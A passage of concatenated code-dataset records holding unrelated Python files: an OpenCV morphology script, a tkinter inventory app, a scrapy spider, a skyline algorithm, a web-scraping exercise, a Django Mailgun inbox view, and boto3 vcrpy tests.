self.assertRaises(exc.IntegrityError) as context:\n db.session.commit()","sub_path":"test_prefs_model.py","file_name":"test_prefs_model.py","file_ext":"py","file_size_in_byte":2261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"313631806","text":"import cv2\nimport numpy as np\n\ndef Opening():\n originalImage = cv2.imread('C:\\\\Users\\\\ashis\\\\Pictures\\\\Camera Roll\\\\RP_back.PNG')\n img = cv2.cvtColor(originalImage, cv2.COLOR_BGR2GRAY)\n kernel = np.ones((5, 5), np.uint8)\n #erosion = cv2.erode(originalImage, kernel, iterations=1)\n closing = cv2.morphologyEx(img, cv2.MORPH_CLOSE, kernel)\n\n cv2.imshow('image', closing)\n\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n #img = cv2.cvtColor(originalImage, cv2.COLOR_BGR2GRAY)\n\nOpening()","sub_path":"MorphologicalTransformation.py","file_name":"MorphologicalTransformation.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"271854347","text":"import tkinter as tk\r\nfrom tkinter import *\r\nimport utils\r\n\r\n\r\n\r\n### Frames 
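One caveat on the OpenCV entry above: the function is named `Opening` but `cv2.morphologyEx(img, cv2.MORPH_CLOSE, kernel)` performs a closing (dilation followed by erosion); an opening would use `cv2.MORPH_OPEN`. A minimal side-by-side sketch on a synthetic image (illustrative only):

import cv2
import numpy as np

img = (np.random.rand(64, 64) > 0.5).astype(np.uint8) * 255
kernel = np.ones((5, 5), np.uint8)
opened = cv2.morphologyEx(img, cv2.MORPH_OPEN, kernel)   # erosion, then dilation
closed = cv2.morphologyEx(img, cv2.MORPH_CLOSE, kernel)  # dilation, then erosion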
###\r\nclass MainWindow(tk.Frame):\r\n ''' Main Window '''\r\n def __init__(self, parent):\r\n tk.Frame.__init__(self, parent)\r\n\r\n\r\nclass OptionFrame(tk.Frame):\r\n ''' Use your options '''\r\n def __init__(self, parent):\r\n tk.Frame.__init__(self, parent)\r\n\r\n\r\nclass EntryFrame(tk.Frame):\r\n ''' Use your options '''\r\n def __init__(self, parent):\r\n tk.Frame.__init__(self, parent)\r\n\r\n self.parent = parent\r\n\r\n self.config(bg='#BCCE98')\r\n\r\n self.nameVar = StringVar()\r\n self.qtyVar = StringVar()\r\n self.catVar = StringVar()\r\n\r\n self.nameLabel = Label(self, text='Item name: ', bg='#BCCE98', font=\"helvetica 14\")\r\n self.nameEntry = Entry(self, textvariable=self.nameVar)\r\n self.qtyLabel = Label(self, text='Quantity: ', bg='#BCCE98', font=\"helvetica 14\")\r\n self.qtyEntry = Entry(self, textvariable=self.qtyVar)\r\n self.catLabel = Label(self, text='Category: ', bg='#BCCE98', font=\"helvetica 14\")\r\n self.catEntry = Entry(self, textvariable=self.catVar)\r\n\r\n cats = utils.loadCategories()\r\n\r\n if not cats:\r\n cats=tuple(' ')\r\n \r\n self.catMenu = OptionMenu(self, self.catVar, *cats)\r\n\r\n self.nameLabel.grid(row=0, column=0)\r\n self.nameEntry.grid(row=0, column=1)\r\n self.qtyLabel.grid(row=1, column=0)\r\n self.qtyEntry.grid(row=1, column=1)\r\n self.catLabel.grid(row=2, column=0)\r\n self.catEntry.grid(row=2, column=1)\r\n self.catMenu.grid(row=2, column=2, sticky=\"ew\")\r\n\r\n Grid.columnconfigure(self, 0, weight=1)\r\n Grid.columnconfigure(self, 1, weight=1)\r\n Grid.columnconfigure(self, 2, weight=1)\r\n \r\n\r\n \r\n\r\n \r\n\r\nclass SearchFrame(tk.Frame):\r\n ''' Search '''\r\n def __init__(self, parent, var=None):\r\n tk.Frame.__init__(self, parent)\r\n\r\n self.label = Label(self, text='Search here: ', bg='#BCCE98', font='helvetica 14').pack(side=LEFT)\r\n self.entry = Entry(self, textvariable=var, font='helvetica 14')\r\n self.entry.pack(fill='x')\r\n\r\nclass NavFrame(tk.Frame):\r\n ''' Navigation buttons '''\r\n def __init__(self, parent):\r\n tk.Frame.__init__(self, parent)\r\n\r\n FONT = \"Helvetica 14 bold\"\r\n\r\n\r\n \r\n\r\n nxt = Button(self, text='>', command=parent.nextpage, height=2, width=20, font=FONT, bg='#f9f9f9')\r\n \r\n\r\n prv = Button(self, text='<', command=parent.prevpage, height=2, width=20, font=FONT, bg='#f9f9f9')\r\n \r\n \r\n fst = Button(self, text='<<', command=parent.firstpage, height=2, width=20, font=FONT, bg='#f9f9f9')\r\n \r\n \r\n lst = Button(self, text='>>', command=parent.lastpage, height=2, width=20, font=FONT, bg='#f9f9f9')\r\n\r\n\r\n rfr = Button(self, text='Refresh', command=parent.update, height=2, width=20, font=FONT, bg='#f9f9f9')\r\n\r\n\r\n\r\n\r\n fst.pack(side=LEFT)\r\n prv.pack(side=LEFT)\r\n lst.pack(side=RIGHT)\r\n nxt.pack(side=RIGHT)\r\n rfr.pack(side=RIGHT)\r\n\r\n\r\nclass PageInfoFrame(tk.Frame):\r\n '''Show the current page number'''\r\n def __init__(self, parent):\r\n tk.Frame.__init__(self, parent)\r\n\r\n self.parent = parent\r\n \r\n self.config(bg = '#BCCE98')\r\n \r\n FONT = 'helvetica 14'\r\n\r\n self.string = ''\r\n\r\n self.page = Label(self, font=FONT, bg = '#BCCE98')\r\n\r\n self.page.pack(side=LEFT)\r\n\r\n self.update()\r\n\r\n def update(self):\r\n\r\n pagenr = self.parent.start.get() // 10\r\n\r\n pagenr += 1\r\n\r\n pageend = self.parent.length // 10\r\n\r\n pageend += 1\r\n\r\n self.string = 'Page: {0} of {1}'.format(pagenr, pageend)\r\n\r\n self.page.config(text=self.string)\r\n\r\n \r\n\r\nclass FilterFrame(tk.Frame):\r\n ''' Used as labels for columns 
'''\r\n def __init__(self, parent):\r\n tk.Frame.__init__(self, parent)\r\n\r\n self.parent = parent\r\n\r\n self.config(bg = '#BCCE98')\r\n\r\n FONT = 'helvetica 14'\r\n\r\n name = Label(self, text='Item name', font=FONT, width=30, bg = '#BCCE98').pack(side=LEFT)\r\n\r\n cate = Label(self, text='Category', font=FONT, width=20, bg = '#BCCE98').pack(side=LEFT)\r\n\r\n quan = Label(self, text='Quantity', font=FONT, bg = '#BCCE98').pack(side=LEFT)\r\n \r\n #opts = Button(self, font='helvetica 11 bold', width=60).pack(side=RIGHT, fill='y')\r\n\r\nclass ListFrame(tk.Frame):\r\n ''' View all the Listings '''\r\n def __init__(self, parent):\r\n tk.Frame.__init__(self, parent)\r\n\r\n self.parent = parent\r\n\r\n self.config(bg='#BCCE98')\r\n\r\n self.listing = list()\r\n\r\n FONT = \"Helvetica 14 bold\"\r\n\r\n \r\n self.start = IntVar()\r\n self.end = IntVar()\r\n\r\n self.start.set(0)\r\n self.end.set(10)\r\n\r\n\r\n self.navVar = 1\r\n\r\n self.entryBool = False\r\n \r\n \r\n self.filter = ''\r\n\r\n\r\n self.length = 0\r\n\r\n\r\n\r\n self.parent.bind(\"\", self.default)\r\n self.parent.bind(\"\", self.default)\r\n\r\n self.parent.bind(\"\", self._destroy)\r\n\r\n\r\n self.createEntryButton()\r\n #self.entryButton = Button(self, text='New Entry', command=self.entry, height=4, font=FONT)\r\n #self.entryButton.pack(fill='x',padx=10, pady=10)\r\n \r\n\r\n \r\n self.searchphrase = StringVar()\r\n\r\n\r\n \r\n\r\n self.searchBar = SearchFrame(self, var=self.searchphrase)\r\n\r\n self.searchBar.pack(fill='x')\r\n\r\n \r\n\r\n self.navFrame = NavFrame(self)\r\n\r\n self.navFrame.pack(pady=5)\r\n\r\n\r\n\r\n self.pageInfo = PageInfoFrame(self)\r\n\r\n self.pageInfo.pack()\r\n \r\n\r\n\r\n self.filterFrame = FilterFrame(self)\r\n\r\n self.filterFrame.pack(fill='x')\r\n\r\n\r\n\r\n\r\n self.parent.bind(\"\", self.sortName)\r\n\r\n self.parent.bind(\"\", self.sortCat)\r\n\r\n self.parent.bind(\"\", self.sortQty)\r\n\r\n self.parent.bind(\"\", self.reset)\r\n \r\n self.parent.bind(\"\", self.firstpage)\r\n\r\n self.parent.bind(\"\", self.prevpage)\r\n\r\n self.parent.bind(\"\", self.nextpage)\r\n\r\n self.parent.bind(\"\", self.lastpage)\r\n\r\n self.parent.bind(\"\", self.update)\r\n\r\n self.searchBar.entry.focus()\r\n\r\n \r\n #upd = Button(self, text='update', command=self.update)\r\n #upd.pack()\r\n\r\n '''\r\n\r\n nxt = Button(self, text='>', command=self.nextpage, height=2, width=20, font=FONT)\r\n \r\n\r\n prv = Button(self, text='<', command=self.prevpage, height=2, width=20, font=FONT)\r\n \r\n \r\n fst = Button(self, text='<<', command=self.firstpage, height=2, width=20, font=FONT)\r\n \r\n \r\n lst = Button(self, text='>>', command=self.lastpage, height=2, width=20, font=FONT)\r\n \r\n\r\n fst.pack(anchor=NW)\r\n prv.pack(anchor=NW)\r\n nxt.pack(anchor=NE)\r\n lst.pack(anchor=NE)\r\n\r\n '''\r\n \r\n\r\n\r\n \r\n self.update()\r\n def update(self, event=None):\r\n # obs!!!\r\n\r\n\r\n \r\n listing_data = utils.load() # manipulate list to contain filtered results\r\n\r\n\r\n\r\n search = self.searchphrase.get()\r\n\r\n if search:\r\n results = utils.search(search, listing_data)\r\n listing_data = results\r\n self.start.set(0)\r\n self.end.set(10)\r\n\r\n self.length = len(listing_data)\r\n \r\n self.pageInfo.update()\r\n\r\n s = self.start.get()\r\n e = self.end.get()\r\n\r\n\r\n if self.filter:\r\n if self.filter == 'dispname':\r\n listing_data = sorted(listing_data, key=lambda item: item['dispname'])\r\n elif self.filter == 'category':\r\n listing_data = sorted(listing_data, key=lambda item: 
item['category'])\r\n elif self.filter == 'quantity':\r\n listing_data = sorted(listing_data, key=lambda item: item['quantity'], reverse=True)\r\n \r\n \r\n\r\n [item.destroy() for item in self.listing]\r\n\r\n self.listing = [Listing(self, item, item['dispname'])\r\n for item in listing_data[s:e]]\r\n \r\n\r\n \r\n [item.pack(expand=True, fill='both') for item in self.listing]\r\n\r\n self.filter = ''\r\n\r\n\r\n def nextpage(self, event=None):\r\n \r\n s = self.start.get()\r\n e = self.end.get()\r\n\r\n if e > self.length:\r\n return\r\n\r\n self.start.set(s + 10)\r\n self.end.set(e + 10)\r\n\r\n self.update()\r\n \r\n def prevpage(self, event=None):\r\n\r\n s = self.start.get()\r\n e = self.end.get()\r\n\r\n if not s:\r\n return\r\n\r\n self.start.set(s - 10)\r\n self.end.set(e - 10)\r\n \r\n self.update()\r\n\r\n def firstpage(self, event=None):\r\n \r\n self.start.set(0)\r\n self.end.set(10)\r\n \r\n self.update()\r\n \r\n \r\n def lastpage(self, event=None):\r\n length = len(utils.load())\r\n\r\n if not length % 10:\r\n e = length\r\n s = e - 10\r\n\r\n else:\r\n \r\n intdiv = length // 10\r\n\r\n s = intdiv * 10\r\n e = s + 10\r\n \r\n self.start.set(s)\r\n self.end.set(e)\r\n \r\n self.update()\r\n\r\n def focus(self, event):\r\n\r\n self.searchBar.entry.focus()\r\n\r\n\r\n def createEntryButton(self):\r\n\r\n FONT = \"Helvetica 14 bold\"\r\n self.entryButton = Button(self, text='New Entry', command=self.entry, height=4, font=FONT, bg='#647939')\r\n self.entryButton.pack(fill='x',padx=10, pady=10)\r\n\r\n\r\n\r\n\r\n def entry(self):\r\n\r\n self.entryBool = True\r\n\r\n \r\n self.parent.bind(\"\", self.handleUpDown)\r\n self.parent.bind(\"\", self.handleUpDown)\r\n \r\n \r\n self.entryButton.destroy()\r\n \r\n self.entryFrame = EntryFrame(self)\r\n self.entryFrame.pack(fill='x', anchor='n', pady=10)\r\n self.entryFrame.nameEntry.focus()\r\n\r\n\r\n self.destAll()\r\n self.packAll()\r\n\r\n \r\n self.update()\r\n self.parent.bind(\"\", self.breakEntry)\r\n\r\n def breakEntry(self, event):\r\n\r\n self.entryBool = False\r\n\r\n \r\n self.parent.bind(\"\", self.default)\r\n self.parent.bind(\"\", self.default)\r\n \r\n self.parent.bind(\"\", self.update)\r\n\r\n\r\n nme = self.entryFrame.nameVar.get()\r\n qty = self.entryFrame.qtyVar.get()\r\n cat = self.entryFrame.catVar.get()\r\n\r\n if nme and cat:\r\n if utils.findExist(nme, cat):\r\n \r\n data = utils.load()\r\n\r\n try:\r\n qty = int(qty)\r\n if qty:\r\n for item in data:\r\n if item['dispname']==nme and item['category']==cat:\r\n item['quantity'] += qty\r\n except:\r\n for item in data:\r\n if item['dispname']==nme and item['category']==cat:\r\n item['quantity'] += 1\r\n utils.dump(data)\r\n else:\r\n\r\n try:\r\n qty = int(qty)\r\n if qty:\r\n entry = utils.entry(dispname=nme,\r\n quantity=qty,\r\n category=cat)\r\n except:\r\n entry = utils.entry(dispname=nme,\r\n category=cat)\r\n \r\n \r\n data = utils.load()\r\n data.append(entry)\r\n utils.dump(data)\r\n\r\n\r\n self.entryFrame.destroy()\r\n\r\n self.destAll()\r\n\r\n self.createEntryButton()\r\n\r\n self.packAll()\r\n \r\n self.parent.bind(\"\", self.update)\r\n\r\n self.searchBar.entry.focus()\r\n\r\n self.update()\r\n \r\n\r\n \r\n \r\n \r\n\r\n def handleUpDown(self, event):\r\n code = event.keycode\r\n\r\n if code == 38:\r\n if self.navVar == 1:\r\n return\r\n self.navVar -= 1\r\n else:\r\n if self.navVar == 3:\r\n return\r\n self.navVar += 1\r\n print(self.navVar)\r\n\r\n n = self.navVar\r\n\r\n if n == 1:\r\n self.entryFrame.nameEntry.focus()\r\n if n == 2:\r\n 
self.entryFrame.qtyEntry.focus()\r\n if n == 3:\r\n self.entryFrame.catEntry.focus()\r\n\r\n def destAll(self):\r\n \r\n self.searchBar.destroy()\r\n self.navFrame.destroy()\r\n self.pageInfo.destroy()\r\n self.filterFrame.destroy()\r\n\r\n def packAll(self):\r\n\r\n\r\n self.searchBar = SearchFrame(self, var=self.searchphrase)\r\n\r\n self.searchBar.pack(fill='x')\r\n\r\n \r\n\r\n self.navFrame = NavFrame(self)\r\n\r\n self.navFrame.pack(pady=5)\r\n\r\n\r\n \r\n self.pageInfo = PageInfoFrame(self)\r\n\r\n self.pageInfo.pack()\r\n\r\n\r\n\r\n self.filterFrame = FilterFrame(self)\r\n\r\n self.filterFrame.pack(fill='x')\r\n\r\n\r\n \r\n\r\n\r\n def default(self, event):\r\n pass\r\n\r\n def _destroy(self, event):\r\n self.parent.destroy()\r\n\r\n def sortName(self, event):\r\n self.filter = 'dispname'\r\n self.update()\r\n\r\n \r\n def sortCat(self, event):\r\n self.filter = 'category'\r\n self.update()\r\n\r\n \r\n def sortQty(self, event):\r\n self.filter = 'quantity'\r\n self.update()\r\n\r\n def reset(self, event):\r\n self.searchphrase.set('')\r\n self.update()\r\n\r\n \r\n\r\n \r\n\r\n \r\nclass Listing(tk.Frame):\r\n # obs!!!!\r\n ''' One line of listing '''\r\n def __init__(self, parent, data, dispname):\r\n tk.Frame.__init__(self, parent)\r\n\r\n self.parent = parent\r\n\r\n self.data = data\r\n\r\n self.dispname = dispname\r\n\r\n self.config(bg='#f4f6ee', bd=1, relief=GROOVE)\r\n\r\n\r\n FONT = \"Helvetica 14\"\r\n\r\n\r\n \r\n \r\n nameLabel = Label(self, text=data['dispname'], font=FONT, bg='#f4f6ee')\r\n catLabel = Label(self, text=data['category'], font=FONT, bg='#f4f6ee')\r\n qtyLabel = Label(self, text=data['quantity'], font=FONT, bg='#f4f6ee')\r\n removeButton = Button(self, text='Remove', command=self.remove, fg='red', font='Helvetica 11 bold', bg='#f9f9f9')\r\n remOneButton = Button(self, text='-1', command=self.remOne, fg='red', font='Helvetica 11 bold', bg='#f9f9f9')\r\n addTenButton = Button(self, text='+10', command=self.addTen, fg='green', font='Helvetica 11 bold', bg='#f9f9f9')\r\n addFiveButton = Button(self, text='+5', command=self.addFive, fg='green', font='Helvetica 11 bold', bg='#f9f9f9')\r\n addOneButton = Button(self, text='+1', command=self.addOne, fg='green', font='Helvetica 11 bold', bg='#f9f9f9')\r\n \r\n\r\n nameLabel.pack(side=LEFT)\r\n catLabel.pack(side=LEFT)\r\n qtyLabel.pack(side=LEFT)\r\n removeButton.pack(side=RIGHT)\r\n remOneButton.pack(side=RIGHT)\r\n addTenButton.pack(side=RIGHT)\r\n addFiveButton.pack(side=RIGHT)\r\n addOneButton.pack(side=RIGHT)\r\n \r\n\r\n \r\n removeButton.configure(height=2, width=20)\r\n remOneButton.configure(height=2, width=10)\r\n addTenButton.configure(height=2, width=10)\r\n addFiveButton.configure(height=2, width=10)\r\n addOneButton.configure(height=2, width=10)\r\n nameLabel.configure(width=30)\r\n catLabel.configure(width=20)\r\n qtyLabel.configure(width=4)\r\n\r\n def addOne(self):\r\n '''\r\n listing_data = utils.load()\r\n listing_data[self.row]['quantity'] += 1\r\n utils.dump(listing_data)\r\n self.parent.update()\r\n '''\r\n listing_data = utils.load()\r\n for i in listing_data:\r\n if i == self.data:\r\n i['quantity'] += 1\r\n utils.dump(listing_data)\r\n self.parent.update()\r\n \r\n def addTen(self):\r\n '''\r\n listing_data = utils.load()\r\n listing_data[self.row]['quantity'] += 10\r\n utils.dump(listing_data)\r\n self.parent.update()\r\n '''\r\n listing_data = utils.load()\r\n for i in listing_data:\r\n if i == self.data:\r\n i['quantity'] += 10\r\n utils.dump(listing_data)\r\n 
self.parent.update()\r\n \r\n def addFive(self):\r\n '''\r\n listing_data = utils.load()\r\n listing_data[self.row]['quantity'] += 5\r\n utils.dump(listing_data)\r\n self.parent.update()\r\n '''\r\n listing_data = utils.load()\r\n for i in listing_data:\r\n if i == self.data:\r\n i['quantity'] += 5\r\n utils.dump(listing_data)\r\n self.parent.update()\r\n \r\n def remOne(self):\r\n listing_data = utils.load()\r\n temp_data = listing_data[:]\r\n for i in listing_data:\r\n if i == self.data:\r\n if i['quantity'] == 0:\r\n return\r\n else:\r\n i['quantity'] -= 1\r\n utils.dump(listing_data)\r\n self.parent.update()\r\n return\r\n \r\n\r\n \r\n def remove(self):\r\n listing_data = utils.load()\r\n temp_data = listing_data[:]\r\n for i in listing_data:\r\n if i == self.data:\r\n temp_data = [item for item in temp_data if not item == self.data]\r\n utils.dump(temp_data)\r\n self.parent.update()\r\n return\r\n \r\n \r\n \r\n\r\n### Buttons ###\r\nclass AddOneBut(tk.Button):\r\n ''' Button to add one item'''\r\n def __init__(self, parent):\r\n tk.Button.__init__(self, parent)\r\n\r\n self.parent = parent\r\n\r\nclass SubOneBut(tk.Button):\r\n ''' Button to subtract one item'''\r\n def __init__(self, parent):\r\n tk.Button.__init__(self, parent)\r\n\r\n self.parent = parent\r\n\r\nclass RemoveBut(tk.Button):\r\n ''' Button to remove item'''\r\n def __init__(self, parent):\r\n tk.Button.__init__(self, parent)\r\n\r\n self.parent = parent\r\n\r\n\r\n\r\n\r\n### Special ###\r\n\r\n\r\n\r\n\r\ndef main():\r\n ''' For testing / development purposes '''\r\n\r\n\r\n root = Tk()\r\n\r\n\r\n fr = ListFrame(root)\r\n \r\n \r\n fr.pack(expand=True, fill='x', pady=10, padx=10, anchor=N)\r\n\r\n root.overrideredirect(True) #remove comment (#) when in production\r\n\r\n root.geometry(\"{0}x{1}\".format(root.winfo_screenwidth(), root.winfo_screenheight()))\r\n\r\n root.configure(background='#BCCE98')\r\n\r\n root.mainloop()\r\n\r\n\r\n\r\n\r\n \r\n\r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"swamp.pyw","file_name":"swamp.pyw","file_ext":"pyw","file_size_in_byte":18792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"476704795","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom scrapy.contrib.spiders import CrawlSpider, Rule\nfrom scrapy.contrib.linkextractors import LinkExtractor\nfrom qb.items import qb_item\n#from scrapy.contrib.linkextractors.sgml import SgmlLinkExtractor\n#import logging\n\n\n\nclass qb_spider(CrawlSpider):\n name = 'qb'\n allowed_domains = ['qiushibaike.com']\n start_urls = ['http://www.qiushibaike.com']\n download_delay = 1\n rules = [\n Rule(LinkExtractor(allow=('/8hr/page/'), restrict_xpaths=('//span[@class=\"next\"]/..')),callback='parse_item',follow=True)\n ]\n\n def parse_item(self, response):\n\n sel = response.xpath('//div[@class=\"article block untagged mb15\"]/div[@class=\"content\"]')\n for line in sel:\n item = qb_item()\n item['content'] = line.xpath('text()').extract()\n yield item\n\n\n\n\n\n","sub_path":"qb/qb/spiders/qb_spider.py","file_name":"qb_spider.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"9635734","text":"from heapq import _heapify_max, _heappop_max\nclass Solution(object):\n def getSkyline(self, buildings):\n \"\"\"\n :type buildings: List[List[int]]\n :rtype: List[List[int]]\n \"\"\"\n start_end_array = []\n array_data_dict = {}\n for building in buildings:\n if building[0] not in 
array_data_dict:\n array_data_dict[building[0]] = {\n 's': [building[2]],\n 'e': []\n }\n else:\n array_data_dict[building[0]]['s'].append(building[2])\n if building[1] not in array_data_dict:\n array_data_dict[building[1]] = {\n 'e': [building[2]],\n 's': []\n }\n else:\n array_data_dict[building[1]]['e'].append(building[2])\n\n array_x_sorted = sorted(array_data_dict.keys())\n for x in array_x_sorted:\n same_x = array_data_dict[x]\n same_x_start = same_x.get('s')\n same_x_end = same_x.get('e')\n if same_x_start:\n same_x_start = sorted(same_x_start, reverse=True)\n for s_i in same_x_start:\n start_end_array.append((x, s_i, True))\n if same_x_end:\n same_x_end = sorted(same_x_end)\n for e_i in same_x_end:\n start_end_array.append((x, e_i, False))\n\n priority_que_dict = {0 : 1}\n ans = []\n # priority_que = _heapify_max([])\n\n max_height = -1\n for corrd in start_end_array:\n\n if corrd[2]:\n if corrd[1] in priority_que_dict:\n priority_que_dict[corrd[1]] += 1\n else:\n priority_que_dict[corrd[1]] = 1\n # priority_que = heappop(list(priority_que_dict.keys()))\n\n test = list(priority_que_dict.keys())\n _heapify_max(test)\n\n\n else:\n priority_que_dict[corrd[1]] -= 1\n if priority_que_dict[corrd[1]] == 0:\n del priority_que_dict[corrd[1]]\n # priority_que = list(priority_que_dict.keys())\n # _heappop_max(test)\n test = list(priority_que_dict.keys())\n _heapify_max(test)\n\n\n\n height = test[0]\n if max_height != height:\n max_height = height\n ans.append([corrd[0], height])\n return ans\n\nsol = Solution()\nprint(sol.getSkyline([[2,9,10],[3,7,15],[5,12,12],[15,20,10],[19,24,8]]))","sub_path":"python/218. skyline.py","file_name":"218. skyline.py","file_ext":"py","file_size_in_byte":2606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"29275638","text":"import urllib.request as UR\nfrom bs4 import BeautifulSoup\n\nurl = \"http://pr4e.dr-chuck.com/tsugi/mod/python-data/data/known_by_Fikret.html\"\ncount = 4\npos = 3\ntaglist = list()\nurllist = list()\nurllist.append(url)\n\nprint('Retrieving: ', urllist[0])\n\nfor i in range(count):\n html = UR.urlopen(urllist[-1]).read()\n #print(html)\n #print(urllist[-1])\n soup = BeautifulSoup(html,'lxml')\n print(soup)\n tags = soup.find_all('a')\n #print('Tags:',tags)\n\n# for tag in tags:\n# #taglist = list()\n# #taglist.append(tag)\n# url = tag.get('href',None)\n# print('Retrieving:',url)\n# #urllist.append(url)\n# #url = taglist[pos].get('href', None)\n# \t #print('Retrieving: ', url)\n# # urllist.append(url)\n# # \n# # print('Last Url: ', urllist[-1])","sub_path":"soup3.py","file_name":"soup3.py","file_ext":"py","file_size_in_byte":812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"236976041","text":"from django.shortcuts import render\nfrom django.db import transaction\nfrom .mailgun_helper import *\nfrom . 
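The skyline solution above leans on heapq's private `_heapify_max`/`_heappop_max` and rebuilds the heap at every event. A common alternative uses only the public heapq API: push negated heights onto a min-heap and lazily pop expired buildings. This is a sketch assuming the usual [left, right, height] input convention, verified against the sample input:

import heapq

def skyline(buildings):
    # events: (x, -height, right) for building starts, (right, 0, None) for ends
    events = sorted([(l, -h, r) for l, r, h in buildings] +
                    list({(r, 0, None) for _, r, _ in buildings}))
    ans, live = [], [(0, float('inf'))]   # heap of (neg_height, end_x); sentinel never pops
    for x, neg_h, r in events:
        while live[0][1] <= x:            # lazily drop buildings that have ended
            heapq.heappop(live)
        if neg_h:
            heapq.heappush(live, (neg_h, r))
        if not ans or ans[-1][1] != -live[0][0]:
            ans.append([x, -live[0][0]])  # the max height changed: record a key point
    return ans

print(skyline([[2, 9, 10], [3, 7, 15], [5, 12, 12], [15, 20, 10], [19, 24, 8]]))
# [[2, 10], [3, 15], [7, 12], [12, 0], [15, 10], [20, 8], [24, 0]]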
import models\nimport email\nimport re\nimport django.contrib.auth as auth\nfrom django.contrib.auth.decorators import login_required\n\n#Downloads all messages from Mailgun and returns success or failure.\n@transaction.atomic\ndef get_all_mailgun_messages(request):\n result = mget(\"events\").json()\n events=result['items']\n message_urls=[i['storage']['url'] for i in events if i['event']=='stored']\n messages_request = [mget(i, prepend=False) for i in message_urls]\n messages_dict=[i.json() for i in messages_request]\n messages_json=[i.text for i in messages_request]\n count = 0\n #For each message, we make an e-mail model and save it.\n for i, json_raw in zip(messages_dict, messages_json):\n #We first extract the message id, which is supposed to be unique for all e-mails everywhere.\n headers=i['message-headers']\n #Nothing actually stops someone sending a message with multiple headers of the same type.\n ids=[j[1] for j in headers if j[0] == 'Message-Id']\n id=ids[0]\n #This ID may already be in the database. If it is, we bail out now.\n exists=models.Email.objects.filter(message_id= id).count()\n if exists >0:\n continue\n #The other pieces of important information we need out of the e-mail are the In-Reply-To header and the References header.\n #Together, these form a list of ids which we use to build threads, later.\n in_reply_to =[j[1] for j in headers if j[0]== 'In-Reply-To']\n references=[j[1] for j in headers if j[0]=='References']\n #The in_reply_to field is one id only so we start with that.\n in_thread = list(in_reply_to)\n for j in references:\n in_thread +=re.findall(r\"<[^<]+>\", j)\n in_thread = set(in_thread) #remove duplicates.\n #We now have enough info to build the message itself as follows.\n new_message=models.Email(\n was_sent=False,\n mailgun_json = json_raw,\n message_id=id,\n subject=i['subject'],\n from_address=i['from'],\n )\n #Build up a list of all the e-mail addresses involved in this e-mail.\n all_addresses = i['from']+\",\"+i['To']\n new_message.all_addresses= all_addresses\n new_message.save()\n #Next, build the thread by pointing all messages at the latest.\n for j in models.Email.objects.filter(message_id__in = list(in_thread)):\n j.latest = new_message\n j.save()\n #Finally, handle users.\n user_emails= [j.strip() for j in i['recipients'].split(\",\")]\n users=list(models.UserProfile.objects.filter(email__in = user_emails))\n new_message.for_users = users\n new_message.save()\n for u in users:\n u.save()\n count +=1\n return render(request, 'simplemail/mailgun_got_messages.html', {'count': count})\n\n@login_required\ndef inbox(request):\n messages= request.user.userprofile.owned_emails.all().order_by('-date')\n return render(request, \"simplemail/inbox.html\", {'messages': messages})\n\n@login_required\ndef view_message(request, message_id):\n pass\n","sub_path":"cen4010/simplemail/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
{"seq_id":"106407386","text":"import pytest\nimport os\n\nboto3 = pytest.importorskip(\"boto3\")\n\nimport boto3 # NOQA\nimport botocore # NOQA\nimport vcr # NOQA\n\nses = boto3.Session(\n aws_access_key_id=os.environ['AWS_ACCESS_KEY_ID'],\n aws_secret_access_key=os.environ['AWS_SECRET_ACCESS_KEY'],\n aws_session_token=None,\n region_name=os.environ['AWS_DEFAULT_REGION'],\n # botocore_session=None,\n # profile_name=None\n)\n\nIAM_CLIENT = ses.client('iam')\n\ntry:\n from botocore import awsrequest # NOQA\n\n 
botocore_awsrequest = True\nexcept ImportError:\n botocore_awsrequest = False\n\n\n# skip tests if boto does not use vendored requests anymore\n# https://github.com/boto/botocore/pull/1495\nboto3_skip_vendored_requests = pytest.mark.skipif(\n botocore_awsrequest,\n reason='botocore version {ver} does not use vendored requests anymore.'.format(\n ver=botocore.__version__))\n\nboto3_skip_awsrequest = pytest.mark.skipif(\n not botocore_awsrequest,\n reason='botocore version {ver} still uses vendored requests.'.format(\n ver=botocore.__version__))\n\n\n@boto3_skip_vendored_requests\ndef test_boto_vendored_stubs(tmpdir):\n with vcr.use_cassette(str(tmpdir.join('boto3-stubs.yml'))):\n # Perform the imports within the patched context so that\n # HTTPConnection, VerifiedHTTPSConnection refers to the patched version.\n from botocore.vendored.requests.packages.urllib3.connectionpool import \\\n HTTPConnection, VerifiedHTTPSConnection\n from vcr.stubs.boto3_stubs import VCRRequestsHTTPConnection, VCRRequestsHTTPSConnection\n # Prove that the class was patched by the stub and that we can instantiate it.\n assert issubclass(HTTPConnection, VCRRequestsHTTPConnection)\n assert issubclass(VerifiedHTTPSConnection, VCRRequestsHTTPSConnection)\n HTTPConnection('hostname.does.not.matter')\n VerifiedHTTPSConnection('hostname.does.not.matter')\n\n\n@boto3_skip_awsrequest\ndef test_boto3_awsrequest_stubs(tmpdir):\n with vcr.use_cassette(str(tmpdir.join('boto3-stubs.yml'))):\n from botocore.awsrequest import AWSHTTPConnection, AWSHTTPSConnection\n from vcr.stubs.boto3_stubs import VCRRequestsHTTPConnection, VCRRequestsHTTPSConnection\n assert issubclass(VCRRequestsHTTPConnection, AWSHTTPConnection)\n assert issubclass(VCRRequestsHTTPSConnection, AWSHTTPSConnection)\n AWSHTTPConnection('hostname.does.not.matter')\n AWSHTTPSConnection('hostname.does.not.matter')\n\n\ndef test_boto3_without_vcr():\n username = 'user'\n response = IAM_CLIENT.get_user(UserName=username)\n\n assert response['User']['UserName'] == username\n\n\ndef test_boto_medium_difficulty(tmpdir):\n username = 'user'\n\n with vcr.use_cassette(str(tmpdir.join('boto3-medium.yml'))):\n response = 